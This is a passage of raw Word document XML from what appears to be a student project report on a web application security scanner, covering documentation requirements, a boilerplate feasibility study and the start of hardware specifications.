            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc43339141"/>
      <w:bookmarkStart w:id="47" w:name="_Toc30758"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>File structure requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>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structure of the payload and configuration files has been given. If necessary, additional fields or configurations can be added. Ensure unique identification of records through a key field; use a composite key field if needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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All validations can be defined within the property sheets of forms or through scripting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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Editing or deleting records should be managed through the application interface or script options.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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Explore additional features and validations if time permits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc43339142"/>
      <w:bookmarkStart w:id="49" w:name="_Toc162"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Documentation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="16"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The documentation should be submitted to the coordinator in the specified format. It should include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Problem Statement</w:t>
      </w:r>
      <w:r>
        <w:t>: Outline the objectives and goals of the project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Form Design</w:t>
      </w:r>
      <w:r>
        <w:t>: Describe the design and structure of the user interface forms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Validation Performed</w:t>
      </w:r>
      <w:r>
        <w:t>: Detail any validation logic applied to inputs and forms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Suggested Enhancements</w:t>
      </w:r>
      <w:r>
        <w:t>: Propose potential improvements for future iterations of the project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Hardware and Software Specifications</w:t>
      </w:r>
      <w:r>
        <w:t>: List the hardware and software requirements for the project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>Appendix</w:t>
      </w:r>
      <w:r>
        <w:t>: Include all handwritten outlines, form designs, and report templates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:p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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc43339143"/>
      <w:bookmarkStart w:id="51" w:name="_Toc14007"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Feasibility Study</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:p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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Technical Feasibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Operation Feasibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="360"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Economic Feasibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc31949"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Technical Feasibility</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>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technical issues usually raised during the feasibility stage of the investigation include the following:</w:t>
      </w:r>
    </w:p>
    <w:p>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Does the necessary technology exist to do what is suggested?</w:t>
      </w:r>
    </w:p>
    <w:p>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Do the proposed equipment have the technical capacity to hold the data required to use the new system?</w:t>
      </w:r>
    </w:p>
    <w:p>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Will the proposed system provide adequate response to inquiries, regardless of the number or location of users?</w:t>
      </w:r>
    </w:p>
    <w:p>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Can the system be upgraded if developed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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Are there technical guarantees of accuracy, reliability, ease of access, and data security?</w:t>
      </w:r>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Our system is technically feasible for the following reasons:</w:t>
      </w:r>
    </w:p>
    <w:p>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Technology</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: The project leverages existing and widely used technologies such as Selenium WebDriver, Python, and web application scanning techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>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Capacity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: The proposed equipment and cloud resources can handle the data and processing requirements of the system.</w:t>
      </w:r>
    </w:p>
    <w:p>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Scalability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: The system can be upgraded and scaled to accommodate more users and more extensive vulnerability scanning capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>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Reliability and Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: The system uses secure coding practices, ensuring data security and reliability. Permissions are granted based on roles, ensuring accuracy and control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc11452"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Operational Feasibility</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>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Proposed projects are beneficial only if they can be turned into information systems that meet the organization’s operational requirements. Operational feasibility aspects of the project are an important part of the project implementation. Some of the important issues raised to test the operational feasibility of a project include the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Is there sufficient support for the management from the users?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Will the system be used and work properly if it is developed and implemented?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Will there be any resistance from the users that will undermine the possible application benefits?</w:t>
      </w:r>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This system is designed to address these issues:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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Support</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: The system has received sufficient support from management and users. Their requirements have been taken into consideration during the planning phase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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Usability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: The system is user-friendly and easy to operate, following a step-by-step approach to perform tasks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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Acceptance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: No significant resistance from users is expected, as the system addresses their needs effectively and efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc9419"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Economic Feasibility</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>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For declaring that the system is economically feasible, it should be cost-effective and within budgetary constraints. It should be cheap and quick to implement. The economic feasibility aspects include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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The system is cost-effective, utilizing existing resources and technologies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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No additional peripherals or software are required for the development of the system, minimizing costs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>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The system leverages open-source tools and platforms, reducing licensing costs and making it affordable for deployment and maintenance.</w:t>
      </w:r>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Overall, the proposed web application security scanner project is feasible across technical, operational, and economic dimensions. It effectively utilizes current technologies, meets user and organizational needs, and operates within budget constraints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc43339147"/>
      <w:bookmarkStart w:id="56" w:name="_Toc14775"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Requirement Specifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc1435"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Hardware Specifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>*NIX Systems</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> (incl.64-bit)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> GB RAM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>recommended</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>500 MB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> hard disk space + at least </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="000000" w:themeColor="text1"/>
